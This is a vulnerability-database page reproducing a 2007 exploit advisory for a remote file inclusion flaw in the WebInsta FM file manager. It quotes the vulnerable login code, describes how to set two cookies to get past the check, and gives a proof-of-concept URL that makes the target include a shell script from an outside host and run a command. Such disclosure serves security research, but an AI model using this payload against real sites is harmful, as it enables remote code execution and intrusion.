Lucene search
K

webinsta-rfi.txt

🗓️ 17 Apr 2007 00:00:00Reported by MurderSkillzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

WebInsta FM 0.1.4 Remote File Inclusion Vulnerability in admin logi

Code
`Program Title ################################################################################  
WebInsta FM <= 0.1.4 Remote File Inclusion Vulnerability  
  
Description ##################################################################################  
This is a basic file manager written by WebInsta.com  
  
Vuln Code ####################################################################################  
In /admin/login.php:  
if(isset($_COOKIE['adminname']) && isset($_COOKIE['adminpass'])){  
$cusername = $_COOKIE['adminname'];  
$cpassword = $_COOKIE['adminpass'];  
include($absolute_path."admin/checkpass.php");  
}  
  
Exploit ######################################################################################  
In order for this exploit to work, you need to set two cookies. Once set, these cookies are  
never analyzed for their actual content. If you use FireFox, you can set them with the AnEC  
Cookie Editor extension. The two cookies should be set as follows:  
  
NAME - adminname  
CONTENT - anything here  
HOST - current site (www.site.com)  
PATH - nothing  
  
NAME - adminpass  
CONTENT - anything here  
HOST - current site (www.site.com)  
PATH - nothing  
  
Once set, the PoC URL is as follows:  
http://site.com/path/to/files/admin/login.php?absolute_path=http://shell.com/shell.txt?cmd=ls  
  
Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work.  
  
Script Download ##############################################################################  
http://webinsta.com/cgi-bin/axs/ax.pl?http://www.webinsta.com/downloads/webinstafm.zip  
  
Original Advisory ############################################################################  
http://g00ns-forum.net/  
  
Shouts #######################################################################################  
g00ns.net  
13337.org  
rezen.org  
  
By MurderSkillz & FiSh of g00ns.net`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Apr 2007 00:00Current
7.4High risk
Vulners AI Score7.4
33